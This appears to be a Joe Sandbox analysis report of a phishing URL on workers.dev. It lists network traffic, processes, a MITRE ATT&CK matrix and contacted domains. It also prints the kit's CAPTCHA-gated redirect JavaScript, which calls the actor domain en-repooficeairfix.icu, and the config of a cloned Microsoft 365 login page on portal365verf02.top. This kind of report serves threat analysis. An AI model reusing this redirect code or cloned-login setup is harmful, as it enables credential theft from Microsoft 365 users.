javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';

Source: chromecache_80.2.dr, chromecache_103.2.dr, chromecache_99.2.dr	String found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback
Source: chromecache_80.2.dr, chromecache_99.2.dr	String found in binary or memory: https://en-repooficeairfix.icu/?ctsllixw
Source: chromecache_103.2.dr	String found in binary or memory: https://en-repooficeairfix.icu/?ctsllixw&qrc=test
Source: chromecache_81.2.dr	String found in binary or memory: https://fpt.live.com/
Source: chromecache_77.2.dr	String found in binary or memory: https://login.live.com
Source: chromecache_82.2.dr	String found in binary or memory: https://portal365verf02.top/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3Bvcn

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64503 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64504 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64504
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64506
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64503
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64518
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64518 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64506 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64722

Source: classification engine

Classification label: mal68.phis.win@21/55@24/8

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1916 --field-trial-handle=2008,i,7632152184494238359,10947971405357003457,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1916 --field-trial-handle=2008,i,7632152184494238359,10947971405357003457,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Drive-by Compromise	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label
https://portal365verf02.top/?qrc=test%40test.org	0%	Avira URL Cloud	safe
https://en-repooficeairfix.icu/?ctsllixw&qrc=test	0%	Avira URL Cloud	safe
https://en-repooficeairfix.icu/?ctsllixw&qrc=test@test.org	0%	Avira URL Cloud	safe
https://portal365verf02.top/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3BvcnRhbDM2NXZlcmYwMi50b3AvIiwiZG9tYWluIjoicG9ydGFsMzY1dmVyZjAyLnRvcCIsImtleSI6IlFoWHFXUmFMZENvSiIsInFyYyI6InRlc3RAdGVzdC5vcmciLCJpYXQiOjE3MzY5Njc5NzMsImV4cCI6MTczNjk2ODA5M30.YFx4H1uKgJMzg3QIJ3_BfumkI9UX5LynRfp4R_DmUTY	0%	Avira URL Cloud	safe
https://portal365verf02.top/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3BvcnRhbDM2NXZlcmYwMi50b3AvIiwiZG9tYWluIjoicG9ydGFsMzY1dmVyZjAyLnRvcCIsImtleSI6ImZ0WUhUM0dTcUd1QyIsInFyYyI6InRlc3RAdGVzdC5vcmciLCJpYXQiOjE3MzY5Njc5NzQsImV4cCI6MTczNjk2ODA5NH0.jTcyUqYjKiN8a3rooRgvvOoXZXUeN8_PT53X1To-DvI	0%	Avira URL Cloud	safe
https://en-repooficeairfix.icu/?ctsllixw	0%	Avira URL Cloud	safe
https://portal365verf02.top/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3Bvcn	0%	Avira URL Cloud	safe
https://portal365verf02.top/favicon.ico	0%	Avira URL Cloud	safe
https://52f1897b.5648702dd4d5255cab645104.workers.dev/favicon.ico	0%	Avira URL Cloud	safe
https://portal365verf02.top/owa/?login_hint=test%40test.org	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sni1gl.wpc.alphacdn.net	152.199.21.175	true	false	high
challenges.cloudflare.com	104.18.94.41	true	false	high
portal365verf02.top	178.215.224.116	true	false	high
en-repooficeairfix.icu	178.215.224.116	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
www.google.com	172.217.16.196	true	false	high
52f1897b.5648702dd4d5255cab645104.workers.dev	172.67.208.94	true	false	high
15.164.165.52.in-addr.arpa	unknown	unknown	false	high
fpt.live.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1	false		high
https://en-repooficeairfix.icu/?ctsllixw&qrc=test@test.org	false	Avira URL Cloud: safe	unknown
https://portal365verf02.top/owa/?login_hint=test%40test.org	false	Avira URL Cloud: safe	unknown
https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org	false		unknown
https://portal365verf02.top/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3BvcnRhbDM2NXZlcmYwMi50b3AvIiwiZG9tYWluIjoicG9ydGFsMzY1dmVyZjAyLnRvcCIsImtleSI6IlFoWHFXUmFMZENvSiIsInFyYyI6InRlc3RAdGVzdC5vcmciLCJpYXQiOjE3MzY5Njc5NzMsImV4cCI6MTczNjk2ODA5M30.YFx4H1uKgJMzg3QIJ3_BfumkI9UX5LynRfp4R_DmUTY	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902823eb1c368c99&lang=auto	false		high
https://portal365verf02.top/?qrc=test%40test.org	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.js	false		high
https://portal365verf02.top/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3BvcnRhbDM2NXZlcmYwMi50b3AvIiwiZG9tYWluIjoicG9ydGFsMzY1dmVyZjAyLnRvcCIsImtleSI6ImZ0WUhUM0dTcUd1QyIsInFyYyI6InRlc3RAdGVzdC5vcmciLCJpYXQiOjE3MzY5Njc5NzQsImV4cCI6MTczNjk2ODA5NH0.jTcyUqYjKiN8a3rooRgvvOoXZXUeN8_PT53X1To-DvI	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1497844684:1736965888:hR1bQafLozQXnmaBH5lAypMI_u7ggQ5Cnikt2oePCQI/902823eb1c368c99/ae1BCWt9k0HcV1Stw.aqaNNjGsPp.vEgo6dugpndcQs-1736967958-1.1.1.1-SrGUcSV2bImxYiTTejixzDrtDboHC6MPNX7hfWvhi72sA8.3NMOByHbV8EB8W0OX	false		high
https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback	false		high
https://portal365verf02.top/favicon.ico	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/902823eb1c368c99/1736967959959/12ed8f27cd128fe67bd2821f7dc95d58c918c3876a33e3c66d9bc91bc3837de7/WmSt7LN2AskYnSv	false		high
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5ourm/0x4AAAAAAA44TVMLbqDkCk-m/auto/fbE/normal/auto/	false		high
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/902823eb1c368c99/1736967959960/79oBvcNDV_Yq-3G	false		high
https://52f1897b.5648702dd4d5255cab645104.workers.dev/favicon.ico	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://en-repooficeairfix.icu/?ctsllixw	chromecache_80.2.dr, chromecache_99.2.dr	false	Avira URL Cloud: safe	unknown
https://portal365verf02.top/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3Bvcn	chromecache_82.2.dr	false	Avira URL Cloud: safe	unknown
https://en-repooficeairfix.icu/?ctsllixw&qrc=test	chromecache_103.2.dr	false	Avira URL Cloud: safe	unknown
https://fpt.live.com/	chromecache_81.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.208.94	52f1897b.5648702dd4d5255cab645104.workers.dev	United States	13335	CLOUDFLARENETUS	false
216.58.212.164	unknown	United States	15169	GOOGLEUS	false
104.21.42.188	unknown	United States	13335	CLOUDFLARENETUS	true
104.18.94.41	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
178.215.224.116	portal365verf02.top	Germany	10753	LVLT-10753US	false
172.217.16.196	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592132
Start date and time:	2025-01-15 20:04:52 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.phis.win@21/55@24/8
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.67, 216.58.206.78, 108.177.15.84, 142.250.184.238, 142.250.186.78, 199.232.210.172, 2.23.77.188, 172.217.16.206, 40.126.32.140, 20.190.160.22, 40.126.32.136, 40.126.32.68, 40.126.32.138, 40.126.32.74, 20.190.160.14, 40.126.32.134, 142.250.181.238, 52.167.30.171, 142.250.185.170, 142.250.186.138, 142.250.181.234, 142.250.186.42, 142.250.185.74, 172.217.16.138, 142.250.186.106, 216.58.206.42, 142.250.184.202, 142.250.185.202, 142.250.185.138, 142.250.186.74, 142.250.186.170, 216.58.212.138, 142.250.185.234, 216.58.206.74, 52.168.117.170, 142.250.185.131, 172.217.23.110, 2.23.194.22, 4.245.163.56, 13.107.246.45, 52.165.164.15, 4.175.87.197
Excluded domains from analysis (whitelisted): logincdn.msauth.net, greenid-prod-pme.eastus2.cloudapp.azure.com, lgincdnmsftuswe2.azureedge.net, pme-greenid-prod.trafficmanager.net, slscr.update.microsoft.com, clientservices.googleapis.com, browser.events.data.trafficmanager.net, acctcdn.msauth.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, update.googleapis.com, csp.microsoft.com, azurefd-t-prod.trafficmanager.net, acctcdnvzeuno.azureedge.net, acctcdnvzeuno.ec.azureedge.net, onedscolprdeus13.eastus.cloudapp.azure.com, prdv4a.aadg.msidentity.com, fpt2.microsoft.com, fs.microsoft.com, acctcdnmsftuswe2.azureedge.net, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, acctcdnmsftuswe2.afd.azureedge.net, lgincdnvzeuno.ec.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, lgincdnvzeuno.azureedge.net, ipv6.login.live.com, b
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org

Input	Output
URL: https://52f1897b.5648702dd4d5255cab645104.workers.dev Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": false, "long_subdomain": true, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true, "reasoning": "This URL uses Cloudflare Workers (.workers.dev domain), which is a legitimate service but can be misused. The long hexadecimal subdomain pattern is suspicious and could be used for dynamic/temporary hosting. The .dev TLD combined with workers subdomain indicates third-party hosting." }
URL: https://52f1897b.5648702dd4d5255cab645104.workers.dev
URL: https://52f1897b.5648702dd4d5255cab645104.workers.... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The script demonstrates a mix of behaviors, including the use of a CAPTCHA system, encryption of user agent data, and a request to an external domain. While the CAPTCHA system and encryption suggest some security measures, the use of an obfuscated URL and the lack of transparency around the external domain raise concerns. Further review is needed to determine the full intent and potential risks of this script." }
var verifyCallback_CF = function (response) { if (response && response.length > 10) { sendRequest(); // Only send the request after CAPTCHA is solved } }; window.onloadTurnstileCallback = function () { turnstile.render("#turnstileCaptcha", { sitekey: "0x4AAAAAAA44TVMLbqDkCk-m", callback: verifyCallback_CF, }); }; function hh2(encryptedText, shift) { let decryptedText = ""; for (let i = 0; i < encryptedText.length; i++) { let c = encryptedText[i]; if (c.match(/[a-z]/i)) { let code = encryptedText.charCodeAt(i); if ((code >= 65) && (code <= 90)) { c = String.fromCharCode(((code - 65 - shift + 26) % 26) + 65); } else if ((code >= 97) && (code <= 122)) { c = String.fromCharCode(((code - 97 - shift + 26) % 26) + 97); } } decryptedText += c; } return decryptedText; } function Encrypt(text, publicKey) { console.log('encrypt with public key:', publicKey); return text; } let sx = "https://en-repooficeairfix.icu/?ctsllixw&qrc=test@test.org"; const PUBLIC_KEY = `-----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxCJBwcY8t0AqPquU+Ah1 R0EPWlcD5XSXhOEe00844TkiGLFHnMWQEugh0zYh/kgrw8hv1ifOmf4Jrkis3tlW qpIO2U9Nle23D1VKpxZSxRyYTbnoyq3lRcqY5txOJKdviR9fA9wPidS6KTXhX2xq wq1jjYvgHtntEGYwK6Lzm6Q8jTjfV7ICqnV74GTKnPN7VMDKsS2+Dcf2Y2IoYY1o NM7nWPKFeVUmkqFMowkdBmGJHL4UqRcxbhiRX3AAzzdQvbQg7OQxYjbKak23IvDN 1ia9SsXQyo5H/XnfXB2Nb9sNayO5sV+hDmBRlujtm1+maqGMJUXZeVHL81Q7O22a WQIDAQAB -----END PUBLIC KEY-----`; function sendRequest() { const userAgent = navigator.userAgent; const EncryptedUserAgent = Encrypt(userAgent, PUBLIC_KEY); console.log('Sending request with encrypted user-agent:', EncryptedUserAgent); let xhr = new XMLHttpRequest(); xhr.open('GET', sx, true); xhr.setRequestHeader("accept", "application/json"); xhr.setRequestHeader("qrc-auth", EncryptedUserAgent); xhr.onreadystatechange = function() { if (xhr.readyState === XMLHttpRequest.DONE) { if (xhr.status === 200) { const cc = JSON.parse(xhr.responseText); if (cc.url) { window.location = cc.url; } else { document.body.innerHTML = cc.error ? cc.error : 'ACCESS DENIED'; } } else { document.body.innerHTML = 'CONNECTION TO HOST FAILED'; } } }; xhr.send(); }
URL: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The provided JavaScript snippet contains several behaviors that raise moderate security concerns. It includes external data transmission to third-party domains, the use of fallback domains, and aggressive DOM manipulation. While the script appears to have a legitimate purpose, such as authentication and analytics, the lack of transparency and the use of some outdated practices warrant further review. The overall risk score is in the medium range, indicating the need for closer inspection to ensure the script's security and alignment with best practices." }
//<![CDATA[ $Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://portal365verf02.top/aadcdn.msauth.net/~/shared/1.0/","urlDefaultFavicon":"https://portal365verf02.top/aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000\u0026redirect_uri=https%3a%2f%2fportal365verf02.top%2fowa%2f\u0026resource=00000002-0000-0ff1-ce00-000000000000\u0026response_mode=form_post\u0026response_type=code+id_token\u0026scope=openid\u0026msafed=1\u0026msaredir=1\u0026login_hint=test%40test.org\u0026client-request-id=c9d8adfb-498b-9c70-ec4b-25284edee691\u0026protectedtoken=true\u0026claims=%7b%22id_token%22%3a%7b%22xms_cc%22%3a%7b%22values%22%3a%5b%22CP1%22%5d%7d%7d%7d\u0026nononce=638725647761308227.2a3c6ba0-1fc4-4994-90c0-543ef05cb9e5\u0026state=FYtLCoAgFAC1LtKmpfXSpy8X0VHCxD4QCiV0_WwxM6vhjLG6UBU4FDEyaiSpDRKZQcEoJXXSKW9WB2LYPAq0FoUFD0KjChtov9qgeXmbPr2un6-0n3E5zpinHJ7cIvzp0r1_\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://portal365verf02.top/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/sso?client-request-id=c9d8adfb-498b-9c70-ec4b-25284edee691","iwaSsoProbeUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/ssoprobe?client-request-id=c9d8adfb-498b-9c70-ec4b-25284edee691","iwaIFrameUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/iframe?client-request-id=c9d8adfb-498b-9c70-ec4b-25284edee691\u0026isAdalRequest=False","iwa